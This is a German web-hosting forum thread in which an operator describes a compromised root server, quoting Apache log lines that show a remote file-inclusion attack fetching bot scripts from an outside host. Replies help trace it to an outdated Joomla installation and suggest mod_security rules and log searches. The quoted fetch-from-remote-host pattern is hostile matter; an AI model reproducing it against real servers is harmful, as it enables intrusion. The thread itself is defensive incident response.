ABAKUS

Hallo liebe Gemeinde,

wir hatten letzte Nacht eine üble Attacke auf unseren Rootserver.
Wie das nachfolgende Script sich installieren konnte, wissen wir derzeit noch nicht, es läßt auf jeden Fall den Speicher überlaufen und sorgt innerhalb von Minuten für 20GB Traffic. Ein Neustart des Apache mit "rcapache2 restart" bringt einen Error, nur "reboot" geht und das jetzt alle 60Minuten, denn dann geht der Apache in den Schlafmodus.

Hier ein Auszug aus der Error Apache:

--14:57:15-- https://saids.com/botek.txt
=> `botek.txt'
Resolving saids.com... done.
Connecting to saids.com[66.36.242.36]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,994 [text/plain]

0K .......... ...... 100% 1464.83 KB/s

14:57:15 (1464.83 KB/s) - `botek.txt' saved [16994/16994]

[client 210.193.55.2]
rm: cannot remove `botek.txt.*': No such file or directory
--14:57:21-- https://saids.com/a
=> `a'
Resolving saids.com... done.
Connecting to saids.com[66.36.242.36]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,258 [text/plain]

0K .......... .......... ......... 100% 1487.94 KB/s

14:57:22 (1487.94 KB/s) - `a' saved [30258/30258]

Bitte dringend Hilfe, wir wir diesen Prozess stoppen bzw. auch erstmal finden?!

Bitte keine unkonstruktiven Kommentare wie: schafft Euch einen Administrator an oder holt Euch Webpakete bei 1und1!
Wir arbeiten seit 3 Jahren mit Rootservern und hatten bis heute keine Probleme und diesen Fall lernt man auch nicht mit Linuxstudium und diversen Handbüchern...

Vielen Dank

Ists denn immer die gleiche IP? Dann einfach die IP blocken.
In solchen Fällen kannst du dich in der Regel immer an den Support wenden, hatte ich auch schonmal und hab innerhalb 30 Minuten Hilfe bekommen.

Vielleicht hilft Dir das irgendwie weiter:
https://directadmin.com/forum/showthrea ... adid=14098

Hallo

Die eigentliche Sicherheitslücke wirst du wohl in irgendeinem PHP-Modul / Script / Mod finden.
Gelesen?
https://forum.joomla.org/index.php?topic=89758.0;wap2

Ein in der php.ini könnte als Lösung helfen, bis du die Lücke gefunden hast.

Gruss Kristian

Lies Dir hier mal die Postings von "either" durch:
https://www.directadmin.com/forum/showt ... adid=13646

Herzlichen Dank für die zahlreichen Tipps, wir konnten die php.ini erstmal ändern, allerdings läuft dieses Script immernoch.

Kann ich als ROOT bzw. Admin den Rootserver nach diesem Eintrag durchsuchen, also die Webpakete meiner Kunden, ohne mir jede Datei aus datenschutzgründen anschauen zu müssen?

Ich vermute eventuell ein Script eines Kunden, welches diese botek.txt
extern holt? Oder ist das ein falscher Ansatz?

Vielleicht kennt jemand einen Linuxprofi, der sich dieser Sache annehmen könnte, eine längere, vertrauensvolle Zusammenarbeit wäre nett.

Wenn es noch geht, das Modul mod_security für den Apachen installieren und das Regelset von gotroot.com. Dannach dürfte NICHTS mehr unbemerkt bleiben, kann aber auch dazu führen, dass zuviel geblockt wird.

Dann einfach in den Log-Modus wechseln und das treiben beobachten!

Hallo

Kannst du nicht einfach die LogFiles nach "=http%3A%2F%2Fwww.domain.tld%2Fpath%2Fbotek.txt" durchsuchen?
So solltest du doch das Script / Modul finden, welches diese Datei lädt.

Gruss Kristian

Hatte das Problem auch. Da wurde in /var/tmp/ ein Bouncer installiert. Über diesen Bouncer wird dann versucht per script zuzugreifen und eine Verbindung zu Mirc herzustellen. Bei mir wars Psy-BNC. Reingekommen sie die Jungs über Mambo Galleryscript (schäm).
Habe dann mod_security installiert und die Rootkits Rules eingebunden.
Seit dem ist Ruhe. Versuchen zwar immer noch einige bekommen dann aber einen 403 Fehler.
Die Rules kann man für seine Verhältnisse anpassen.(böse Bots aussperren, zugriffe über Proxys, Emailspam unterbinden usw.)
Aber wie Tiggr schon sagte muss man ein bisschen aufpassen und die Logs beobachten ,damit man nicht einige Sachen ausperrt.
z.B wurde bei mir Google ausgesperrt weil nach "Ten Years After" gesucht wurde und After zu den gesperrten Worten gehörte

Racker

Hallo

Ich lach mich weg...
Gerade rein zufällig realtime im Logfile: Kristian

Ähhhemmm.... Das wird ja noch ne lustige Woche...

Wir haben den Übeltäter erstmal dingfest gemacht!!!!

Es ist tatsächlich eine Joomla Installation Version 1.04, wir hatten dem
Kunden den SafeMode off gesetzt mit dem httpd Spezial Befehl:
php_admin_flag safe_mode off

Das war die Einladung für das schei** Script.

Für alle, die es auch trifft oder noch treffen sollte:
Auf einem Rootserver befindet sich im /tmp Ordner eine Datei mit dem Namen .sessx, die dort nichts zu suchen hat! Dort läuft das Script und stellt alle 2 Minuten eine Verbindung zum MIRC her.

Das Gute ist, es scheint nur Joomla Versionen zu betreffen, bei anderen Versuchen mit SafeMode Off konnten wir das Script nicht mehr finden.

Trotzdem solltet Ihr den Server komplett checken bzw. neu aufsetzen... Nicht das sich noch irgendwo etwas festgesetzt hat!

> bei anderen Versuchen mit SafeMode Off konnten wir das Script nicht mehr finden.

Einmal unsicher, immer unsicher. Da hat Tiggr ganz Recht. Stichwort Rootkits.

Danke für die Antwort, ihr habt ja Recht mit dem Neuaufsetzen des Servers.
Problem sind die 90 Kunden, die wir je Server aufsetzen und da es keine weitere Unterstützung für Confixx gibt, werden wir auf Linux und Plesk umswitchen und jeden Kunden einzeln übertragen.

Das wird eine Süffizusarbeit, die sicher Wochen dauert wird.

Vielleicht kennt jemand ein Script oder Tool, um Confixx zu Plesk zu übertragen?

Purzel